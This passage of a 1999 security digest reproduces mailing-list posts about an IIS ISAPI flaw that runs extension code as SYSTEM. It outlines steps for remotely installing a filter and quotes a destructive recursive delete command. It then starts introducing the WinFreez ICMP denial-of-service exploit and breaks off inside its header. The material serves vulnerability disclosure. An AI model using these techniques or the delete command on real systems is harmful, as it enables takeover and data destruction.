Date: Tue, 9 Mar 1999 00:32:03 -0500
From: Fabien Royer
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM

> -----Original Message-----
> From: Scott L. Krabler [mailto:scottk@visi.com]
> Sent: Monday, March 08, 1999 11:41 PM
> To: Fabien Royer; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: RE: ISAPI Extension vulnerability allows to execute code as
> SYSTEM
>
>
> By this, I'm assuming the required safeguard would be to only implement
> ISAPI filters whose contents are known. Since ISAPI filters can only be

Typically, filters and extensions fulfill different purposes. For instance,
you would not implement a complete WEB based application as a filter for
performance reasons. Filters see all http "traffic" while extensions only
see the http traffic that is directed to them. Unless you have written the
filter yourself (or someone trusted in your organization), you can't know if
a filter is 100% secure either.

> installed locally(?) there shouldn't be any general risk. Yes?

This is not that simple. You can remotely install a filter under IIS if you
can cause the following sequence of events to occur:

1) Place the filter .dll in a location accessible from the web server.
2) Update the registry to register the new filter.
3) Cause a reboot of the machine or stop/start IIS.

All of this can be done from the GetExtensionVersion() call mentioned
earlier.

Finally, you can host a filter *AND* an extension in the same .dll.

Fabien.

>
> -----Original Message-----
> From: Windows NT BugTraq Mailing List
> [mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM]On Behalf Of Fabien Royer
> Sent: Monday, March 08, 1999 10:28 AM
> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM
>
>
> There's a vulnerability in IIS (and other WEB servers executing as SYSTEM)
> that allows to execute an ISAPI extension in the security context of the
> server itself instead of the security context of IUSR_WHATEVER.
> How is this
> possible: when the server loads an ISAPI extension the first
> time, it calls
> GetExtensionVersion().
> During the call to this function, an attacker can
> execute any code as SYSTEM. This is a problem if you're an ISP
> doing hosting
> with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because
> any user allowed to place a "CGI" on the server can take over. Of course,
> this problem is not limited to ISPs.
> Fabien.
>

--------------------------------------------------------------------------------

Date: Wed, 10 Mar 1999 18:28:24 -0500
From: Fabien Royer
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM

Sure, however the executable that you are going to execute will run in a
separate address space and if it is spawned by IIS, it will run in the
security context of IUSR_xxx instead of SYSTEM. This is the *major*
difference between what you can do with the .dll approach and the .exe
approach.

Fabien.

> I don't know that .EXE's are that much safer. How about this:
>
> I upload 4nt.exe (Command.Com/CMD.Exe replacement program)
> I write an EXE that calls it and runs the command 'reboot'
> or even a 'del /zsx c:\*.*' (Which will recursively delete all
> files that aren't currently in use)
>
> Same idea ... different way about it.
>
> Being a developer and having the tools available, I require that
> I get to compile the code myself. That way, I can scan through
> the code to see if it's trying to do anything malicious.
> Granted, this isn't 100% foolproof, but it does help!
>
> Charlie

@HWA

04.4 Winfreez.c new exploit code for win9x and NT
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The full original source code is followed by a Solaris version and further
discussion, from Packetstorm/Bugtraq. (March 11th 1999)

http://www.genocide2600.com/~tattooman/new.shtml#latest

/*
 WinFreez.c by Delmore

 ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN.

 Usage: winfreez sendtoip sendfromip time
 where is victim host, is router for victim host,